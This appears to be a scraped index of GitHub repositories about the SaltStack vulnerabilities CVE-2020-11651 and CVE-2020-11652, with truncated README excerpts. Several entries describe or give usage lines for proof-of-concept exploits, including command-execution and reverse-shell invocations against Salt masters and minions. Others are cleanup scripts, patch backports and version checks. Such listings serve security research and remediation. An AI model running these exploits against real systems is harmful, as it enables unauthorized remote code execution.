CVE-2020-11651

automation operation and maintenance tool for script.Similar to Puppet, SaltStack, Ansible, pipeline. Specifically developed for the shortcomings of ansible.

kasini3000 This is an open source, free, cross-platform, batch, automation, operation and maintenance tool Similar to Puppet, SaltStack, Ansible, pipeline Specifically developed for the shortcomings of ansible Cross-platform means that the master computer can be win or linux The master connected to the linux node uses the ssh protocol The master connected to the win node u

PoC for CVE-2020-11651

CVE-2020-11651 PoC for CVE-2020-11651 Requires Python3 tested on 38 python38 -m pip install pyzmq msgpack ⇒ python38 pocpy -h usage: pocpy [-h] [-p PORT] [-c CMD] [-k] [-m] [-r READ] [-w WRITE] [-f FILE] server [server ] Exploit CVE-2020-11651 positional arguments: server Target Server IP or

This repo contains a cleanup script to remove the effects of the malware attack caused due to salt vulnerabilities on our platform The CVEs for the vulnerabilities are: CVE-2020-11651 CVE-2020-11652 Steps to fix your device If you had iptables or ufw rules on the device, you need to manually add them back Run cleanupsh to undo the actions of the malware Verify that /tmp/

Kali通过跳板攻击远程靶机

Kali通过跳板控制远程靶机 攻击思路： 漏洞利用 CVE-2019-7238Nexus Repository Manager 3 RCE： 漏洞原理介绍： Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3140及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能，而这处功能存在未�

Checks for CVE-2020-11651 and CVE-2020-11652

Salt Stack Profile This profile will check to make sure your salt installation is patched to a level that protects you from CVE-2020-11651, and CVE-2020-11652 It does so by checking to ensure the packages salt-api, salt-cloud, salt-master, salt-minion, salt-ssh, salt-syndic, and salt are either version 30002 or newer, or 201924 or newer, or that they do not exist It also c

saltstack CVE-2020-11652

CVE-2020-11652 saltstack CVE-2020-11652 参考 githubcom/jasperla/CVE-2020-11651-poc

saltstack CVE-2020-11652

CVE-2020-11652 saltstack CVE-2020-11652 参考 githubcom/jasperla/CVE-2020-11651-poc

CVE-2020-11652 & CVE-2020-11651

SaltStack-Exp CVE-2020-11651 CVE-2020-11652 Exec-Master: python exppy --exec-choose master --exec-cmd "whoami" Exec-Minions: python exppy --exec-choose minions --exec-cmd "whoami" GetShell: python exppy --shell-LHOST 8888 --shell-LPORT 4444

渗透逆向个人工具箱整理backup

ToolBox 安全研究渗透工具箱 目录 Android Binary CTF CVE IOT Pentest Web 工作机工具 Android 安卓相关工具箱 ACF AndBug - Android Debugging Library android_run_root_shell - android root 脚本 android-backup-extractor - manifest backup属性问题测试工具 android-forensics - Open source Android Forensics app and framework android-simg2img - Tool to con

Salt security backports for CVE-2020-11651 & CVE-2020-11652

Official patches for previous versions can be requested at: wwwsaltstackcom/lp/request-patch-april-2020/ ⚠ Patches here are custom, and may differ from official ones ⚠ Backported security patches for unsupported salt versions Patches in this repo address the following CVEs: CVE-2020-11651 & CVE-2020-11652 - labsf-securecom/advisories/saltstack-

CVE-2020-11651: Proof of Concept

CVE-2020-11651 An issue was discovered in SaltStack Salt before 201924 and 3000 before 30002 The salt-master process ClearFuncs class does not properly validate method calls This allows a remote user to access some methods without authentication These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions Details Pa

This is a fix POC CVE-2020-11651 & CVE-2020-11651

CVE-2020-11652-CVE-2020-11652-POC This is a fix POC CVE-2020-11651 & CVE-2020-11651 Original version: githubcom/Al1ex/CVE-2020-11652 Error Fixed: TransportWarning: Unclosed transport! <salttransportzeromqRequestClient object at 0x7f2105513690> pip3 install salt RCE python3 CVE-2020-11652py --master <target ip> --port <targ

PoC for CVE-2020-11651

CVE-2020-11651 PoC for CVE-2020-11651 Requires Python3 tested on 38 python38 -m pip install pyzmq msgpack ⇒ python38 pocpy -h usage: pocpy [-h] [-p PORT] [-c CMD] [-k] [-m] [-r READ] [-w WRITE] [-f FILE] server [server ] Exploit CVE-2020-11651 positional arguments: server Target Server IP or

Re-key Salt masters and minions

salt-rekey This is a script designed to quickly re-key Salt minions It was written originally as a part of the mitigation efforts for CVE-2020-11651 and CVE-2020-11652 but it can be used in any scenario in which all minions connected to a Salt master should be forced to re-generate their keys and re-connect For background information on Salt's security model and the role

CVE-2020-11651 This is a POC for CVE-2020-11651, which obtains pre-auth RCE on a salt stack master, and/or all the associated minions Some light details on the issue are here POC for 2020-11652 not included This obtains command execution on the master by creating a runner of saltcmd with function cmdexec_code There's no interactivity implemented, youll need to catch

PoC exploit of CVE-2020-11651 and CVE-2020-11652

PoC exploit for CVE-2020-11651 and CVE-2020-11652 This is a proof of concept exploit based on the initial check script Use it to verify you have successfully updated your Salt master servers to a release containing the required fixes Thanks for F-Secure Labs for their research and reporting Currently this script can be used for filesystem access and scheduling commands on th

Repository that contains a CVE-2020-11651 Exploit updated to work with the latest versions of python.

CVE-2020-11651-PoC Repository that contains a CVE-2020-11651 Exploit updated to work with the latest versions of python and handle the errors with the connections README COPY FROM THE ORIGINAL REPOSITORY Original Repository PoC exploit for CVE-2020-11651 and CVE-2020-11652 This is a proof of concept exploit based on the initial check script Use it to verify you have successfu